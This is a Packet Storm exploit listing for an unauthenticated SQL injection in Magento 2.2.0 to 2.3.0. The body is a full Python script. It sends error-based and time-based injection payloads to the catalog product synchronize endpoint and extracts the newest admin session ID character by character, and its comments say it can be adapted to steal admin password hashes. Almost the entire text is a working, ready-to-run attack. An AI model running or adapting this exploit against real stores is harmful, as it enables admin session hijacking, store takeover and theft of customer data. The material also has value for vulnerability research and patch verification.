Magento 2.3.0 SQL Injection

2019-03-29T00:00:00
ID PACKETSTORM:152285
Type packetstorm
Reporter Charles FOL
Modified 2019-03-29T00:00:00

Description

                                        
                                            `#!/usr/bin/env python3  
# Magento 2.2.0 <= 2.3.0 Unauthenticated SQLi  
# Charles Fol  
# 2019-03-22  
#  
# SOURCE & SINK  
# The sink (from-to SQL condition) has been present from Magento 1.x onwards.  
# The source (/catalog/product_frontend_action/synchronize) from 2.2.0.  
# If your target runs Magento < 2.2.0, you need to find another source.  
#  
# SQL INJECTION  
# The exploit can easily be modified to obtain other stuff from the DB, for  
# instance admin/user password hashes.  
#  
  
import requests  
import string  
import binascii  
import re  
import random  
import time  
import sys  
from urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)  
  
def run(url):  
sqli = SQLInjection(url)  
  
try:  
sqli.find_test_method()  
sid = sqli.get_most_recent_session()  
except ExploitError as e:  
print('Error: %s' % e)  
  
  
def random_string(n=8):  
return ''.join(random.choice(string.ascii_letters) for _ in range(n))  
  
  
class ExploitError(Exception):  
pass  
  
  
class Browser:  
"""Basic browser functionality along w/ URLs and payloads.  
"""  
PROXY = None  
  
def __init__(self, URL):  
self.URL = URL  
self.s = requests.Session()  
self.s.verify = False  
if self.PROXY:  
self.s.proxies = {  
'http': self.PROXY,  
'https': self.PROXY,  
}  
  
  
class SQLInjection(Browser):  
"""SQL injection stuff.  
"""  
  
def encode(self, string):  
return '0x' + binascii.b2a_hex(string.encode()).decode()  
  
def find_test_method(self):  
"""Tries to inject using an error-based technique, or falls back to timebased.  
"""  
for test_method in (self.test_error, self.test_timebased):  
if test_method('123=123') and not test_method('123=124'):  
self.test = test_method  
break  
else:  
raise ExploitError('Test SQL injections failed, not vulnerable ?')  
  
def test_timebased(self, condition):  
"""Runs a test. A valid condition results in a sleep of 1 second.  
"""  
payload = '))) OR (SELECT*FROM (SELECT SLEEP((%s)))a)=1 -- -' % condition  
r = self.s.get(  
self.URL + '/catalog/product_frontend_action/synchronize',  
params={  
'type_id': 'recently_products',  
'ids[0][added_at]': '',  
'ids[0][product_id][from]': '?',  
'ids[0][product_id][to]': payload  
}  
)  
return r.elapsed.total_seconds() > 1  
  
def test_error(self, condition):  
"""Runs a test. An invalid condition results in an SQL error.  
"""  
payload = '))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE %s) -- -' % condition  
r = self.s.get(  
self.URL + '/catalog/product_frontend_action/synchronize',  
params={  
'type_id': 'recently_products',  
'ids[0][added_at]': '',  
'ids[0][product_id][from]': '?',  
'ids[0][product_id][to]': payload  
}  
)  
if r.status_code not in (200, 400):  
raise ExploitError(  
'SQL injection does not yield a correct HTTP response'  
)  
return r.status_code == 400  
  
def word(self, name, sql, size=None, charset=None):  
"""Dichotomically obtains a value.  
"""  
pattern = 'LOCATE(SUBSTR((%s),%d,1),BINARY %s)=0'  
full = ''  
  
check = False  
  
if size is None:  
# Yeah whatever  
size_size = self.word(  
name,  
'LENGTH(LENGTH(%s))' % sql,  
size=1,  
charset=string.digits  
)  
size = self.word(  
name,  
'LENGTH(%s)' % sql,  
size=int(size_size),  
charset=string.digits  
)  
size = int(size)  
  
print("%s: %s" % (name, full), end='\r')  
  
for p in range(size):  
c = charset  
  
while len(c) > 1:  
middle = len(c) // 2  
h0, h1 = c[:middle], c[middle:]  
condition = pattern % (sql, p+1, self.encode(h0))  
c = h1 if self.test(condition) else h0  
  
full += c  
print("%s: %s" % (name, full), end='\r')  
  
print(' ' * len("%s: %s" % (name, full)), end='\r')  
  
return full  
  
def get_most_recent_session(self):  
"""Grabs the last created session. We don't need special privileges aside from creating a product so any session  
should do. Otherwise, the process can be improved by grabbing each session one by one and trying to reach the  
backend.  
"""  
# This is the default admin session timeout  
session_timeout = 900  
query = (  
'SELECT %%s FROM admin_user_session '  
'WHERE TIMESTAMPDIFF(SECOND, updated_at, NOW()) BETWEEN 0 AND %d '  
'ORDER BY created_at DESC, updated_at DESC LIMIT 1'  
) % session_timeout  
  
# Check if a session is available  
  
available = not self.test('(%s)=0' % (query % 'COUNT(*)'))  
  
if not available:  
raise ExploitError('No session is available')  
print('An admin session is available !')  
  
# Fetch it  
  
sid = self.word(  
'Session ID',  
query % 'session_id',  
charset=string.ascii_lowercase + string.digits,  
size=26  
)  
print('Session ID: %s' % sid)  
return sid  
  
run(sys.argv[1])  
  
`